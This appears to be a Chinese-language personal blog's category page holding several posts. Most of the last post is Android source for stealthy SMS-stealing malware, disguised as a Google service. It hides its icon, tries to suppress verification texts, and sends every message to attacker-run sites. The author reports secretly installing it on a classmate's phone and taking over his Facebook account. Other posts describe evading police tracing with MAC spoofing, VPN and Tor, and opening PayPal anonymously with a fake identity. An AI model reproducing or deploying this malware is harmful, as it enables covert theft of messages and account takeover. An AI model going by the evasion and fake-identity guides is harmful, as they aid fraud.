Category:The Internet
Found 26 records. At Page 5 / 6.
-
2016-04-11 21:17:44更新於 2017-05-08 01:29:00
真匿名嗎?
網路上一堆VPN供應商都很愛說 NO Log 不紀錄用戶的數據 ,但客戶又怎麼知道真的沒有紀錄,每個服務商都說保護用戶隱私,然後當警察追查的身分的時候,一下就被服務供應商給賣了。
網路上有不少案例,例如垃圾 HideMyAss ,竟然提交出去給警方,根本就垃圾!會想使用VPN,甚至是付費VPN的人是一定要真匿名與真安全的,然後網路上很少是這麼做的。
經過我自己去調查了一陣子之後,發現,很多部落客發出的文章都說:「那些 VPN 普遍都是騙子,當警察要抓你的時候,VPN供應商就丟出你的用戶資料!」
不是說好了要刪除嗎?不要紀錄嗎?
所以,還是沒辦法只透過一層加密的服務就擺脫所有事情,如果只用 OpenVPN代理一層應該很有機率還是會被追查到。
我是不知道警察有沒有權限可以管到國外的VPN,甚至VPN主機商主動提供資料給警察。
這部分待定。我只知道要通過複雜的代理才可以真正得到 FreeDom 以及 Privacy 。否則現在任何人在網路上做任何事,都非常有機會被抓到,只要有人提告,你基本很難逃離,更何況一般不懂網路的使用者。
通常要躲避被追蹤可以使用Tor洋蔥瀏覽器,或是使用好一點的VPN。雖然Tor的三個節點很可能都是蜜罐被FBI給設陷阱了,所以要先掛一層VPN再用Tor瀏覽器,才會比較安全一點。
「隱私是你的基本權利,不需要擔心他人在背後監視我並懲罰我就因為我當我自己。」
老實說,台灣警察要抓人,光是知道IP是沒辦法的,之前我查的結果是說:必須要先定罪,警察才有權限查IP。否則不可以亂查,更何況國外,應該是不太可能查到的。機會很渺茫。即使如此,我個人還是希望高安全性。絕對匿名!
先在公開的WiFi網路下(記得修改MAC地址,不可以被周圍攝影機拍到自己),註冊安全一點的VPN服務,再開Tor瀏覽器,如果可以的話,再掛一層Web Proxy,這樣基本上就很難追查了。
以上。
WeilsNetLogo
This entry was posted in Experience, Mood, The Internet, Privacy By Weil Jimmer
.
-
2016-04-06 22:04:08更新於 2017-10-11 21:43:51
此方法已過時!請勿使用!未來將會可能重新更新此文章!
首先,這個方法透過不少外國管道!請別擔心。
此方法僅提供一個讓你透過超商繳費的方法可以付款用於大多數線上網站。
第一步先註冊BitoEx的帳號:https://www.bitoex.com
註冊帳號是為了購買全球通用的國際虛擬貨幣比特幣。
而比特幣可以在 BitoEx 購買到。建議購買至少 500 NT$。(可全家超商繳費付款,目前只能"全家"!)
買比特幣教學參考:https://www.bitoex.com/fami?locale=zh-tw
購買完成之後,通常會收到簡訊。如下:
然後,請先開好瀏覽器,登入進去BitoEx,接著點手機裡收到的連結。依照指示儲金額進入BitoEx。
兌換到我的錢包就可以了!(畫面僅供參考)
然後就去 Cryptopay 註冊帳號:https://cryptopay.me/join/f526d895
(使用上面的連結買金融卡可以打 75 折。)
註冊好帳號後,記得驗證 Email,然後登入,就會看到如下介面。
這四組比特幣地址都是你自己帳號的錢,只是貨幣單位不同,而且轉換過去後,就不會被比特幣價格升降而影響到幣值大小。建議直接複製 Bitcoin Account 的地址。之後要儲錢的話,可以直接寄到 USD Account。
就可以直接透過 BitoEx 寄送金額到這個國外網站。
這步驟!請注意!比特幣寄送的過程需要耗費十五分鐘至數小時,可能要等待很長一段時間才會入帳!
然後可以開始購買虛擬卡。
個人建議是買 USD 的虛擬卡拉,有其他需求就依照你自己的想法。
填入好基本資料後就可以送出了,基本上是可以亂填的。
然後選擇剛剛儲進金額的 Bitcoin Account,除非你儲在別的地方,切換到有錢的帳號即可。
接著購買完成後,就可以正式來使用了。先儲錢進去虛擬卡。
建議點 Maximum amount,直接儲最大金額,帳戶類別一樣要選有錢的帳戶,最後你就可以擁有比特幣的金融卡了!
點那個按鈕可以知道你的卡號和安全碼及有效年月。
就會有紀錄在你的交易項目了!而那四位數字就是你的驗證碼。刷新Paypal,填入四位數字驗證碼就完成驗證了!
接著你就可以利用 Paypal進行匿名全球交易,而且只靠"超商繳費"與假身分。
最後我還是要說一件重要的事情,每個月維持卡的費用是1美金,以及這張卡有一些使用上限,可以參考:https://cryptopay.me/bitcoin-debit-card
基本上,使用上限是 2500 €/£/$ ,除非你驗證你的帳號,上傳身分驗證。
以上。
WeilsNetLogo
This entry was posted in General, Experience, Functions, The Internet, Note By Weil Jimmer.
-
2016-04-03 19:18:56更新於 2017-05-19 18:44:58
This entry was posted in General, Software, Free, The Internet, Product, Tools By Weil Jimmer.
-
2015-11-22 13:48:11更新於 2017-05-19 18:59:14
這其實是個老梗,很久以前就知道了。今天又突然想到,發篇文章好了。
很多網站上的程式教學都是錯誤的,取得IP方法用get Header 的 Client-IP 及 X-Forwarded-For。
真的是禍害,Header是可以給用戶隨意變更的。
我修改了 Header 在網站上隨意搜尋 What is my ip ?。
結果大部分網站都有問題!
我怎麼改,網站就怎麼顯示,怎麼都對。如果今天我把Header改成<script>標籤,不就造成了XSS攻擊漏洞?改成SQL語法,造成SQL注入漏洞。
只是剛好想到,之前也沒發過類似的文章,補發。
WeilsNetLogo
This entry was posted in General, Experience, HTML, The Internet, PHP By Weil Jimmer.
-
2015-11-20 20:01:51更新於 2018-03-28 12:23:37
====2015/11/20====
這是我很久以前寫的秘密程式,我當下就很想發表,我有很多都很想發表到我網站,但因網站主機是臨時的,將來還要再次轉移,故我就荒廢了網站整整兩個月(我是指不發文,並非我不管理),現在轉移完畢,意味著我將會再次發文。
================
※純測試,不做非法用途。
首先,因為這程式很兩極化,既可以合法也可以非法,講好聽點就是自動同步SMS訊息到網站上,講難聽點,竊取用戶SMS訊息。
腦筋轉得不夠快的人可能不明白這意味著什麼,只要裝了我寫的程式,就會被我盜光所有帳號。
開發緣由:因為我同學不相信「手機防毒軟體掃描不出病毒」,所以我向他放話,我寫的程式,防毒絕對掃不到。
因為我避免用戶發現這個祕密程式,所以我取名為google_sms_server。到時候要查就很困難。
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:supportsRtl="true"
android:theme="@style/AppTheme" >
<activity android:name=".MainActivity" >
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<receiver
android:name=".SmsCloudBackup"
android:enabled="true"
android:exported="true" >
<intent-filter android:priority="999999999" >
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
</application>
設置 SMS_RECEIVED廣播,備註要記得添加權限,並把優先級別設定為最高級別。
package com.google.google_sms_server;
import android.app.Activity;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.widget.Toast;
public class MainActivity extends Activity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
//setContentView(R.layout.activity_main);
PackageManager p = getPackageManager();
p.setComponentEnabledSetting(getComponentName(), PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);//設定隱藏在Launcher中
Toast.makeText(this,"Google SMS Backup Service運作中",Toast.LENGTH_LONG).show();
this.finish();
}
}
package com.google.google_sms_server;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;
import org.apache.http.NameValuePair;
import org.apache.http.client.HttpClient;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;
import java.util.ArrayList;
import java.util.List;
public class SmsCloudBackup extends BroadcastReceiver {
private String TAG = SmsCloudBackup.class.getSimpleName();
public SmsCloudBackup() {
}
@Override
public void onReceive(Context context, Intent intent) {
// Get the data (SMS data) bound to intent
Bundle bundle = intent.getExtras();
String str = "";
SmsMessage[] msgs = null;
if (bundle != null) {
Object[] pdus = (Object[]) bundle.get("pdus");
msgs = new SmsMessage[pdus.length];
for (int i=0; i < msgs.length; i++) {
msgs[i] = SmsMessage.createFromPdu((byte[]) pdus[i]);
str += "SMS from " + msgs[i].getOriginatingAddress() + " : ";
str += msgs[i].getMessageBody().toString();
str += "\n";
}
if (str.contains("驗證") || str.toLowerCase().contains("verif")){
Log.d(TAG, "ABORT");
this.abortBroadcast();//截斷用戶訊息,讓用戶察覺不到驗證訊息。實際上測試,似乎沒有效果。
}
Log.d(TAG, str);
String aa= "";
try{
aa=java.net.URLEncoder.encode(str,"utf-8");
}catch (Exception ex){
}
new ExcuteAsyncTaskOperation().execute(aa);
}
}
public class ExcuteAsyncTaskOperation extends AsyncTask<String, String, String> {
//異線任務,執行網路動作都要這樣。
@Override
protected String doInBackground(String... parr) {
//進行背景工作,如「Network」,並可轉發值。
//在迴圈中使用publishProgress((onProgressUpdate引數類別)變數);以傳遞資料。
//例如publishProgress((int)50);
HttpClient httpclient = new DefaultHttpClient();
//我POST訊息至兩個釣魚網站。
HttpPost httppost = new HttpPost("http://網站/post/post.php?u=SMS&c=" + parr[0]);
HttpPost httppost2 = new HttpPost("http://網站2/post/post.php?u=SMS&c=" + parr[0]);
try {
List<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(1);
nameValuePairs.add(new BasicNameValuePair("u", "SMS"));
nameValuePairs.add(new BasicNameValuePair("c", parr[0]));
httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));
httpclient.execute(httppost);
httpclient.execute(httppost2);
} catch (Exception ex) {
Log.d(TAG, "ERROR!!!!!!!!!!!!!!!!!!!!!" + ex.toString());
}
return "";
}
}
}
這樣,當用戶安裝完成,並執行後,此程式會從Launcher上消失,意思是找不到此程式的連結,並且會關閉此程式,得去 設定=>應用程式 才可能看到,但我已經取名為google什麼的,用戶很難察覺。
實作結果:
我祕密的裝在同學手機上,在他未察覺的情況下,進行這測試。事後他非常不爽,不過最後他還是原諒我了。
從釣魚網站,取得FB驗證碼。成功盜走FB帳號。
WeilsNetLogo
This entry was posted in Android, General, Java, The Internet, Note By Weil Jimmer.
Linode
